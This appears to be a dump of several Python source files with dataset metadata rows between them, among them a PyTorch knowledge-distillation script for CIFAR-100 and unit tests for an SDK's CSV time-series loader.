self.assertAllClose(variance, expected_var)
def testReuseVars(self):
height, width = 3, 3
with self.test_session() as sess:
image_shape = (10, height, width, 3)
image_values = np.random.rand(*image_shape)
expected_mean = np.mean(image_values, axis=(0, 1, 2))
expected_var = np.var(image_values, axis=(0, 1, 2))
images = tf.constant(image_values, shape=image_shape, dtype=tf.float32)
output = ops.batch_norm(images, decay=0.1, is_training=False)
update_ops = tf.get_collection(ops.UPDATE_OPS_COLLECTION)
with tf.control_dependencies(update_ops):
output = tf.identity(output)
# Initialize all variables
sess.run(tf.global_variables_initializer())
moving_mean = variables.get_variables('BatchNorm/moving_mean')[0]
moving_variance = variables.get_variables('BatchNorm/moving_variance')[0]
mean, variance = sess.run([moving_mean, moving_variance])
# After initialization moving_mean == 0 and moving_variance == 1.
self.assertAllClose(mean, [0] * 3)
self.assertAllClose(variance, [1] * 3)
# Simulate assignment from saver restore.
init_assigns = [tf.assign(moving_mean, expected_mean),
tf.assign(moving_variance, expected_var)]
sess.run(init_assigns)
for _ in range(10):
sess.run([output], {images: np.random.rand(*image_shape)})
mean = moving_mean.eval()
variance = moving_variance.eval()
# Although we feed different images, the moving_mean and moving_variance
# shouldn't change.
self.assertAllClose(mean, expected_mean)
self.assertAllClose(variance, expected_var)
if __name__ == '__main__':
tf.test.main()
| 42.502907 | 80 | 0.665139 | 3,859 | 29,242 | 4.894273 | 0.07774 | 0.074549 | 0.074337 | 0.061365 | 0.831313 | 0.807222 | 0.783767 | 0.767036 | 0.743633 | 0.734844 | 0 | 0.03255 | 0.194173 | 29,242 | 687 | 81 | 42.564774 | 0.76897 | 0.043978 | 0 | 0.656846 | 0 | 0 | 0.048741 | 0.022419 | 0 | 0 | 0 | 0 | 0.232236 | 1 | 0.105719 | false | 0 | 0.013865 | 0 | 0.133449 | 0.001733 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13e6529482cf39e6f986f2fa2c33918778412b41 | 387 | py | Python | game/simulator/simulator.py | laddie132/MD3 | 3df45918e33437e9a2309f7965f34f3a75621059 | [
"MIT"
] | 6 | 2021-02-07T03:20:29.000Z | 2021-04-09T03:34:51.000Z | game/simulator/simulator.py | laddie132/MD3 | 3df45918e33437e9a2309f7965f34f3a75621059 | [
"MIT"
] | null | null | null | game/simulator/simulator.py | laddie132/MD3 | 3df45918e33437e9a2309f7965f34f3a75621059 | [
"MIT"
] | 1 | 2021-12-14T15:42:40.000Z | 2021-12-14T15:42:40.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = "Han"
__email__ = "liuhan132@foxmail.com"
class Simulator:
def __init__(self):
pass
    def init_dialog(self, *args):
        raise NotImplementedError  # raise, not return: returning the class would silently hide a missing override

    def respond_act(self, agent_act, agent_value):
        raise NotImplementedError

    def respond_nl(self, agent_nl):
        raise NotImplementedError
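

# Hypothetical usage sketch (not part of the original file): a concrete
# simulator is expected to subclass Simulator and implement all three hooks.
class EchoSimulator(Simulator):
    """Toy simulator that simply echoes whatever the agent sends."""

    def init_dialog(self, *args):
        return {}

    def respond_act(self, agent_act, agent_value):
        return agent_act, agent_value

    def respond_nl(self, agent_nl):
        return agent_nl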
| 19.35 | 50 | 0.669251 | 44 | 387 | 5.477273 | 0.636364 | 0.311203 | 0.232365 | 0.290456 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013378 | 0.22739 | 387 | 19 | 51 | 20.368421 | 0.792642 | 0.108527 | 0 | 0.272727 | 0 | 0 | 0.069971 | 0.061224 | 0 | 0 | 0 | 0 | 0 | 1 | 0.363636 | false | 0.090909 | 0 | 0.272727 | 0.727273 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 6 |
13e78102d294017c8b8ca8d1f8480cdd3bc98448 | 32 | py | Python | app/__init__.py | sofiabesenski4/scrapr | 18c67ac155e4d329dbd4845df80647e697a4f4bb | [
"MIT"
] | 1 | 2022-03-20T18:52:15.000Z | 2022-03-20T18:52:15.000Z | app/__init__.py | sofiabesenski4/scrapr | 18c67ac155e4d329dbd4845df80647e697a4f4bb | [
"MIT"
] | null | null | null | app/__init__.py | sofiabesenski4/scrapr | 18c67ac155e4d329dbd4845df80647e697a4f4bb | [
"MIT"
] | null | null | null | from app.views import QueryForm
| 16 | 31 | 0.84375 | 5 | 32 | 5.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 32 | 1 | 32 | 32 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b91cbddb4ef84ad241c211fc7f8fc5415fe16b12 | 9,864 | py | Python | distill/model_distill.py | jaykay233/tensorflow_models | 5b60b2adfa5e2d82c59189da6398388ba58c6c33 | [
"Apache-2.0"
] | null | null | null | distill/model_distill.py | jaykay233/tensorflow_models | 5b60b2adfa5e2d82c59189da6398388ba58c6c33 | [
"Apache-2.0"
] | null | null | null | distill/model_distill.py | jaykay233/tensorflow_models | 5b60b2adfa5e2d82c59189da6398388ba58c6c33 | [
"Apache-2.0"
] | null | null | null | ## https://www.kesci.com/mw/project/605fe41acb6d360015a49cea
import os.path as osp
import gzip
from functools import reduce
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader, TensorDataset
from torchvision.models import resnet18
from torchvision import datasets
import numpy as np
from keras.datasets import cifar100
def cifar100_loader(bsz=64):
tr, te = cifar100.load_data()
## train
img, label = tr
img = torch.from_numpy(img).float()
img = img / 255. # BHWC
    img.transpose_(1, 3)  # BHWC -> BCWH, i.e. (B, 3, 32, 32); H == W here, so this matches PyTorch's BCHW
label = torch.from_numpy(label).long()[:, 0]
dst = TensorDataset(img, label)
loader = DataLoader(dst, batch_size=bsz, shuffle=True, num_workers=4, pin_memory=False)
## test
img, label = te
img = torch.from_numpy(img).float()
img = img / 255. # BHWC
    img.transpose_(1, 3)  # BHWC -> BCWH, as above
label = torch.from_numpy(label).long()[:, 0]
dst = TensorDataset(img, label)
te_loader = DataLoader(dst, batch_size=bsz * 2, shuffle=False, num_workers=4, pin_memory=False)
return loader, te_loader
class DeepCNN(nn.Module):
def __init__(self, input_shape=(3, 32, 32), classes=100):
super().__init__()
self.input_shape = input_shape
self.classes = classes
self.m = nn.Sequential(
nn.Conv2d(input_shape[0], 64, 3, 2, 1, bias=False),
nn.BatchNorm2d(64),
nn.ReLU(True),
nn.Conv2d(64, 128, 3, 2, 1, bias=False),
nn.BatchNorm2d(128),
nn.ReLU(True),
nn.Conv2d(128, 256, 3, 2, 1, bias=False),
nn.BatchNorm2d(256),
nn.ReLU(True),
nn.Conv2d(256, 512, 3, 2, 1, bias=False),
nn.BatchNorm2d(512),
nn.ReLU(True),
)
        # reaches ~41.97% dev accuracy
shape = self.get_shape() # 1CHW
d = shape[1] * shape[2] * shape[3]
self.fc = nn.Sequential(
nn.Linear(d, 64),
nn.Linear(64, classes),
)
self.criterion = nn.CrossEntropyLoss(reduction='none')
## init
tot = len(list(self.parameters()))
n = 0
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
n += 1
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
n += 2
print(f'Init {n}, total {tot}')
@torch.no_grad()
def get_shape(self):
x = torch.randn(1, *self.input_shape)
y = self.m(x)
return y.shape
def forward(self, x):
feat = self.m(x)
feat = feat.view(feat.shape[0], -1)
logit = self.fc(feat)
return logit
@torch.no_grad()
def get_p(self, x):
logit = self(x)
p = F.softmax(logit, 1)
return p
def get_loss(self, x, y):
logit = self(x)
loss = self.criterion(logit, y)
loss = loss.mean()
return loss
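

# NOTE: train() and kd() below call eval(loader, model, device), but the
# original script never defines it, so the name would resolve to Python's
# builtin eval and crash. This is a minimal sketch of the assumed top-1
# accuracy helper, with the signature inferred from the call sites (it
# deliberately shadows the builtin to keep those call sites unchanged).
@torch.no_grad()
def eval(loader, model, device):
    model.eval()
    correct, total = 0, 0
    for x, y in loader:
        x, y = x.to(device), y.to(device)
        pred = model(x).argmax(dim=1)  # top-1 prediction
        correct += (pred == y).sum().item()
        total += y.numel()
    model.train()  # restore training mode for the caller's next epoch
    return correct / total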
def train():
epochs = 20
base_lr = 1e-3
min_lr = 1e-5
batch_size = 256
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
model = DeepCNN((3, 32, 32), 100).to(device)
optimizer = torch.optim.Adam(model.parameters(), base_lr)
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(
optimizer, 'max', .1, 4, False, .001, 'abs', min_lr=min_lr)
loader, dev_loader = cifar100_loader(batch_size)
step = 0
bst = 0
for epoch in range(1, 1 + epochs):
for x, y in loader:
x = x.to(device)
y = y.to(device)
step += 1
optimizer.zero_grad()
loss = model.get_loss(x, y)
loss.backward()
optimizer.step()
acc = eval(dev_loader, model, device)
lr = optimizer.param_groups[0]['lr']
print(f'epoch={epoch}, lr={lr:.2e}, dev_acc={acc * 100:.2f}%')
scheduler.step(acc)
if acc > bst:
bst = acc
save_name = 'bst.pt'
torch.save(model.state_dict(), save_name)
print(f'best dev acc={bst * 100:.2f}%')
class ShallowCNN(nn.Module):
def __init__(self, input_shape=(3, 32, 32), classes=100):
super().__init__()
self.input_shape = input_shape
self.classes = classes
self.m = nn.Sequential(
nn.Conv2d(input_shape[0], 64, 3, 2, 1, bias=False),
nn.BatchNorm2d(64),
nn.ReLU(True),
nn.Conv2d(64, 128, 3, 2, 1, bias=False),
nn.BatchNorm2d(128),
nn.ReLU(True),
)
        # ~36.76% dev accuracy
shape = self.get_shape() # 1CHW
d = shape[1] * shape[2] * shape[3]
self.fc = nn.Sequential(
nn.Linear(d, 64),
nn.Linear(64, classes),
)
self.criterion = nn.CrossEntropyLoss(reduction='none')
## init
tot = len(list(self.parameters()))
n = 0
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
n += 1
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
n += 2
print(f'Init {n}, total {tot}')
@torch.no_grad()
def get_shape(self):
x = torch.randn(1, *self.input_shape)
y = self.m(x)
return y.shape
def forward(self, x):
feat = self.m(x)
feat = feat.view(feat.shape[0], -1)
logit = self.fc(feat)
return logit
@torch.no_grad()
def get_p(self, x):
logit = self(x)
p = F.softmax(logit, 1)
return p
def get_loss(self, x, y):
logit = self(x)
loss = self.criterion(logit, y)
loss = loss.mean()
return loss
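

# NOTE: the class below redefines ShallowCNN. This second definition, which adds
# a soft MSE criterion and a distillation-aware get_loss(x, y, p, alpha), shadows
# the plain version above and is the one kd() actually instantiates.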
class ShallowCNN(nn.Module):
def __init__(self, input_shape=(3, 32, 32), classes=100):
super().__init__()
self.input_shape = input_shape
self.classes = classes
self.m = nn.Sequential(
nn.Conv2d(input_shape[0], 64, 3, 2, 1, bias=False),
nn.BatchNorm2d(64),
nn.ReLU(True),
nn.Conv2d(64, 128, 3, 2, 1, bias=False),
nn.BatchNorm2d(128),
nn.ReLU(True),
)
        # ~36.76% dev accuracy
shape = self.get_shape() # 1CHW
d = shape[1] * shape[2] * shape[3]
self.fc = nn.Sequential(
nn.Linear(d, 64),
nn.Linear(64, classes),
)
self.criterion_hard = nn.CrossEntropyLoss(reduction='none')
self.criterion_soft = nn.MSELoss(reduction='none')
## init
tot = len(list(self.parameters()))
n = 0
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
n += 1
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
n += 2
print(f'Init {n}, total {tot}')
@torch.no_grad()
def get_shape(self):
x = torch.randn(1, *self.input_shape)
y = self.m(x)
return y.shape
def forward(self, x):
feat = self.m(x)
feat = feat.view(feat.shape[0], -1)
logit = self.fc(feat)
return logit
@torch.no_grad()
def get_p(self, x):
logit = self(x)
p = F.softmax(logit, 1)
return p
    # Distillation loss: a convex blend of the hard cross-entropy against the
    # true labels and a soft MSE term that matches the student's logits to the
    # teacher's; alpha weights the hard term.
def get_loss(self, x, y, p, alpha=.5):
logit = self(x)
loss_hard = self.criterion_hard(logit, y).mean()
loss_soft = self.criterion_soft(logit, p).mean()
loss = alpha * loss_hard + (1 - alpha) * loss_soft
return loss
def kd():
    ckpt = 'dev-acc-41.97.pt'  # this is my saved teacher-model checkpoint; change it to your own
epochs = 20
base_lr = 1e-3
min_lr = 1e-5
batch_size = 256
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
teacher_model = DeepCNN((3, 32, 32), 100)
teacher_model.load_state_dict(torch.load(ckpt, 'cpu'))
teacher_model.to(device)
teacher_model.eval()
model = ShallowCNN((3, 32, 32), 100).to(device)
optimizer = torch.optim.Adam(model.parameters(), base_lr)
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(
optimizer, 'max', .1, 4, False, .001, 'abs', min_lr=min_lr)
loader, dev_loader = cifar100_loader(batch_size)
## validate
teacher_dev_acc = eval(dev_loader, teacher_model, device)
print(f'Teacher model dev acc={teacher_dev_acc * 100:.2f}%')
teacher_model.eval()
step = 0
tot_steps = epochs * len(loader)
bst = 0
for epoch in range(1, 1 + epochs):
for x, y in loader:
x = x.to(device)
y = y.to(device)
with torch.no_grad():
p = teacher_model(x) # logit
step += 1
optimizer.zero_grad()
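            # Linearly anneal the hard-label weight: k runs from ~0 down to -1
            # over training, so alpha decays from 0.2 to 0 and the student leans
            # increasingly on the teacher's soft (logit-matching) targets.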
start, end = .2, 0.
k = 1 / tot_steps - 1 / tot_steps * step # 0 -> -1
alpha = (start - end) * k + start
loss = model.get_loss(x, y, p, alpha)
loss.backward()
optimizer.step()
acc = eval(dev_loader, model, device)
lr = optimizer.param_groups[0]['lr']
print(f'epoch={epoch}, lr={lr:.2e}, alpha={alpha:.2f}'
f', loss={loss.item():.3f}, dev_acc={acc * 100:.2f}%')
scheduler.step(acc)
if acc > bst:
bst = acc
save_name = 'bst.pt'
torch.save(model.state_dict(), save_name)
print(f'best dev acc={bst * 100:.2f}%') | 28.758017 | 99 | 0.544201 | 1,329 | 9,864 | 3.924003 | 0.146727 | 0.018217 | 0.024161 | 0.010738 | 0.790221 | 0.776798 | 0.742282 | 0.732694 | 0.732694 | 0.726942 | 0 | 0.051435 | 0.318025 | 9,864 | 343 | 100 | 28.758017 | 0.7238 | 0.024939 | 0 | 0.789474 | 0 | 0 | 0.045042 | 0.002398 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067669 | false | 0 | 0.041353 | 0 | 0.169173 | 0.030075 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b91e669f5395290ea96b61a6b23399c50caeb985 | 27 | py | Python | apps/profiles/tests/__init__.py | jamespacileo/packaginator | d4b51ae16e0658fade91e1a6c4ce987ee747b053 | [
"MIT"
] | 1 | 2015-11-08T11:31:09.000Z | 2015-11-08T11:31:09.000Z | apps/profiles/tests/__init__.py | pythonchelle/opencomparison | b39d279e25527520c66335e51455d1f9ba749c9b | [
"MIT"
] | 81 | 2021-02-14T02:35:52.000Z | 2021-04-10T21:14:27.000Z | apps/profiles/tests/__init__.py | pythonchelle/opencomparison | b39d279e25527520c66335e51455d1f9ba749c9b | [
"MIT"
] | 4 | 2021-02-14T19:44:23.000Z | 2021-04-06T22:35:35.000Z | from .test_models import *
| 13.5 | 26 | 0.777778 | 4 | 27 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b947054992da249a521caee248c8140441d1ae75 | 14,609 | py | Python | exabel_data_sdk/tests/scripts/test_load_time_series_from_csv.py | burk/python-sdk | 83fb81d09e0d6a407c8907a75bebb895decc7edc | [
"MIT"
] | null | null | null | exabel_data_sdk/tests/scripts/test_load_time_series_from_csv.py | burk/python-sdk | 83fb81d09e0d6a407c8907a75bebb895decc7edc | [
"MIT"
] | null | null | null | exabel_data_sdk/tests/scripts/test_load_time_series_from_csv.py | burk/python-sdk | 83fb81d09e0d6a407c8907a75bebb895decc7edc | [
"MIT"
] | null | null | null | import unittest
from unittest import mock
import pandas as pd
from dateutil import tz
from exabel_data_sdk import ExabelClient
from exabel_data_sdk.scripts.load_time_series_from_csv import LoadTimeSeriesFromCsv
from exabel_data_sdk.services.csv_time_series_loader import CsvTimeSeriesLoader
from exabel_data_sdk.util.resource_name_normalization import validate_signal_name
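
# CLI arguments shared by every LoadTimeSeriesFromCsv invocation in these tests:
# a placeholder script name, the CSV separator, and a dummy API key.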
common_args = ["script-name", "--sep", ";", "--api-key", "123"]
class TestUploadTimeSeries(unittest.TestCase):
def test_one_signal(self):
data = [["a", "2021-01-01", 1], ["a", "2021-01-02", 2], ["b", "2021-01-01", 3]]
ts_data = pd.DataFrame(data, columns=["entity", "date", "signal1"])
CsvTimeSeriesLoader.set_time_index(ts_data)
time_series = CsvTimeSeriesLoader.get_time_series(ts_data, "signals/acme.")
pd.testing.assert_series_equal(
pd.Series(
[1, 2],
index=pd.DatetimeIndex(["2021-01-01", "2021-01-02"], tz=tz.tzutc()),
name="a/signals/acme.signal1",
),
time_series[0],
)
pd.testing.assert_series_equal(
pd.Series(
[3],
index=pd.DatetimeIndex(["2021-01-01"], tz=tz.tzutc()),
name="b/signals/acme.signal1",
),
time_series[1],
)
def test_two_signals(self):
data = [
["a", "2021-01-01", 1, 100],
["a", "2021-01-02", 2, 200],
["b", "2021-01-01", 3, 300],
]
ts_data = pd.DataFrame(data, columns=["entity", "date", "signal1", "signal2"])
CsvTimeSeriesLoader.set_time_index(ts_data)
time_series = CsvTimeSeriesLoader.get_time_series(ts_data, "signals/acme.")
pd.testing.assert_series_equal(
pd.Series(
[1, 2],
index=pd.DatetimeIndex(["2021-01-01", "2021-01-02"], tz=tz.tzutc()),
name="a/signals/acme.signal1",
),
time_series[0],
)
pd.testing.assert_series_equal(
pd.Series(
[100, 200],
index=pd.DatetimeIndex(["2021-01-01", "2021-01-02"], tz=tz.tzutc()),
name="a/signals/acme.signal2",
),
time_series[1],
)
pd.testing.assert_series_equal(
pd.Series(
[3],
index=pd.DatetimeIndex(["2021-01-01"], tz=tz.tzutc()),
name="b/signals/acme.signal1",
),
time_series[2],
)
pd.testing.assert_series_equal(
pd.Series(
[300],
index=pd.DatetimeIndex(["2021-01-01"], tz=tz.tzutc()),
name="b/signals/acme.signal2",
),
time_series[3],
)
def test_read_file_without_pit(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries.csv",
"--namespace",
"",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
with self.assertRaises(SystemExit):
script.run_script(client, script.parse_arguments())
def test_read_file_use_header_for_signal(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries.csv",
"--namespace",
"",
"--pit-current-time",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
script.run_script(client, script.parse_arguments())
call_args_list = client.time_series_api.bulk_upsert_time_series.call_args_list
self.assertEqual(1, len(call_args_list))
series = call_args_list[0][0][0]
self.assertEqual(2, len(series))
pd.testing.assert_series_equal(
pd.Series(
range(1, 6),
pd.date_range("2021-01-01", periods=5, tz=tz.tzutc()),
name="entityTypes/company/entities/company_A/signals/signal1",
),
series[0],
check_freq=False,
)
pd.testing.assert_series_equal(
pd.Series(
[4, 5],
pd.DatetimeIndex(["2021-01-01", "2021-01-03"], tz=tz.tzutc()),
name="entityTypes/company/entities/company_B/signals/signal1",
),
series[1],
check_freq=False,
)
def test_read_file_with_multiple_signals(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries_multiple_signals.csv",
"--namespace",
"acme",
"--pit-offset",
"0",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
script.run_script(client, script.parse_arguments())
call_args_list = client.time_series_api.bulk_upsert_time_series.call_args_list
self.assertEqual(1, len(call_args_list))
series = call_args_list[0][0][0]
self.assertEqual(4, len(series))
pd.testing.assert_series_equal(
pd.Series(
[1, 2],
pd.DatetimeIndex(["2021-01-01", "2021-01-02"], tz=tz.tzutc()),
name="entityTypes/company/entities/company_A/signals/acme.signal1",
),
series[0],
)
pd.testing.assert_series_equal(
pd.Series(
[10, 20],
pd.DatetimeIndex(["2021-01-01", "2021-01-02"], tz=tz.tzutc()),
name="entityTypes/company/entities/company_A/signals/acme.signal2",
),
series[1],
)
pd.testing.assert_series_equal(
pd.Series(
[4, 5],
pd.DatetimeIndex(["2021-01-01", "2021-01-03"], tz=tz.tzutc()),
name="entityTypes/company/entities/company_B/signals/acme.signal1",
),
series[2],
)
pd.testing.assert_series_equal(
pd.Series(
[40, 50],
pd.DatetimeIndex(["2021-01-01", "2021-01-03"], tz=tz.tzutc()),
name="entityTypes/company/entities/company_B/signals/acme.signal2",
),
series[3],
)
def test_read_file_with_known_time(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries_known_time.csv",
"--namespace",
"acme",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
script.run_script(client, script.parse_arguments())
call_args_list = client.time_series_api.bulk_upsert_time_series.call_args_list
self.assertEqual(1, len(call_args_list))
series = call_args_list[0][0][0]
self.assertEqual(4, len(series))
index_A = pd.MultiIndex.from_arrays(
[
pd.DatetimeIndex(["2021-01-01", "2021-01-02"], tz=tz.tzutc()),
pd.DatetimeIndex(["2021-01-01", "2021-01-05"], tz=tz.tzutc()),
]
)
index_B = pd.MultiIndex.from_arrays(
[
pd.DatetimeIndex(["2021-01-01", "2021-01-03"], tz=tz.tzutc()),
pd.DatetimeIndex(["2021-01-10", "2019-12-31"], tz=tz.tzutc()),
]
)
pd.testing.assert_series_equal(
pd.Series(
[1, 2],
index_A,
name="entityTypes/company/entities/company_A/signals/acme.signal1",
),
series[0],
)
pd.testing.assert_series_equal(
pd.Series(
[10, 20],
index_A,
name="entityTypes/company/entities/company_A/signals/acme.signal2",
),
series[1],
)
pd.testing.assert_series_equal(
pd.Series(
[4, 5],
index_B,
name="entityTypes/company/entities/company_B/signals/acme.signal1",
),
series[2],
)
pd.testing.assert_series_equal(
pd.Series(
[40, 50],
index_B,
name="entityTypes/company/entities/company_B/signals/acme.signal2",
),
series[3],
)
def test_read_file_with_integer_identifiers(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries_with_integer_identifiers.csv",
"--namespace",
"acme",
"--pit-offset",
"30",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
script.run_script(client, script.parse_arguments())
call_args_list = client.time_series_api.bulk_upsert_time_series.call_args_list
self.assertEqual(1, len(call_args_list))
series = call_args_list[0][0][0]
self.assertEqual(2, len(series))
pd.testing.assert_series_equal(
pd.Series(
range(1, 6),
pd.date_range("2021-01-01", periods=5, tz=tz.tzutc()),
name="entityTypes/brand/entities/acme.0001/signals/acme.signal1",
),
series[0],
check_freq=False,
)
pd.testing.assert_series_equal(
pd.Series(
[4, 5],
pd.DatetimeIndex(["2021-01-01", "2021-01-03"], tz=tz.tzutc()),
name="entityTypes/brand/entities/acme.0002/signals/acme.signal1",
),
series[1],
check_freq=False,
)
def test_should_fail_with_invalid_signal_names(self):
signals_errors = {
"0_starts_with_0": "Signal name must start with a letter, "
'contain only letters, numbers, and underscores, but got "0_starts_with_0"',
"contains_!llegal_chars": "Signal name must start with a letter, "
'contain only letters, numbers, and underscores, but got "contains_!llegal_chars"',
"": "Signal name cannot be empty",
"signal_with_sixty_five_characters_in_length_which_more_than_max__": "Signal name "
"cannot be longer than 64 characters, but got "
'"signal_with_sixty_five_characters_in_length_which_more_than_max__"',
}
for signal, error in signals_errors.items():
with self.assertRaises(ValueError) as cm:
validate_signal_name(signal)
self.assertEqual(str(cm.exception), error)
def test_valid_signal_names(self):
valid_signals = [
"signal",
"SIGNAL",
"signal_with_underscores",
"signal_1_with_underscores_and_numbers",
"signal_with_sixty_four_characters_in_length_which_is_the_maximum",
]
for signal in valid_signals:
validate_signal_name(signal)
def test_should_fail_with_invalid_data_points(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/time_series_with_invalid_data_points.csv",
"--namespace",
"acme",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
with self.assertRaises(SystemExit):
script.run_script(client, script.parse_arguments())
def test_valid_no_create_tag(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries_known_time.csv",
"--namespace",
"acme",
"--no-create-tag",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
script.run_script(client, script.parse_arguments())
call_args_list = client.time_series_api.bulk_upsert_time_series.call_args_list
create_tag_status = call_args_list[0][1]["create_tag"]
self.assertEqual(False, create_tag_status)
def test_valid_create_tag(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries_known_time.csv",
"--namespace",
"acme",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
script.run_script(client, script.parse_arguments())
call_args_list = client.time_series_api.bulk_upsert_time_series.call_args_list
create_tag_status = call_args_list[0][1]["create_tag"]
self.assertEqual(True, create_tag_status)
def test_valid_no_create_library_signal(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries_known_time.csv",
"--namespace",
"acme",
"--create-missing-signals",
"--no-create-library-signal",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
client.signal_api.get_signal.return_value = None
script.run_script(client, script.parse_arguments())
call_args_list = client.signal_api.create_signal.call_args_list
create_library_signal_status = call_args_list[0][1]["create_library_signal"]
self.assertEqual(False, create_library_signal_status)
def test_valid_create_library_signal(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries_known_time.csv",
"--namespace",
"acme",
"--create-missing-signals",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
client.signal_api.get_signal.return_value = None
script.run_script(client, script.parse_arguments())
call_args_list = client.signal_api.create_signal.call_args_list
create_library_signal_status = call_args_list[0][1]["create_library_signal"]
self.assertEqual(True, create_library_signal_status)
if __name__ == "__main__":
unittest.main()
| 37.267857 | 95 | 0.572729 | 1,621 | 14,609 | 4.889574 | 0.116595 | 0.027252 | 0.042392 | 0.047691 | 0.844058 | 0.817562 | 0.801792 | 0.790941 | 0.77782 | 0.756624 | 0 | 0.046858 | 0.301732 | 14,609 | 391 | 96 | 37.363171 | 0.730125 | 0 | 0 | 0.673295 | 0 | 0 | 0.211171 | 0.129851 | 0 | 0 | 0 | 0 | 0.096591 | 1 | 0.039773 | false | 0 | 0.022727 | 0 | 0.065341 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9a88f87e3242aee4d73cc395bbf3e4df7779e11 | 235 | py | Python | .history/my_classes/ScopesClosuresAndDecorators/ScopesClosuresDecorators_20210709201222.py | minefarmer/deep-Dive-1 | b0675b853180c5b5781888266ea63a3793b8d855 | [
"Unlicense"
] | null | null | null | .history/my_classes/ScopesClosuresAndDecorators/ScopesClosuresDecorators_20210709201222.py | minefarmer/deep-Dive-1 | b0675b853180c5b5781888266ea63a3793b8d855 | [
"Unlicense"
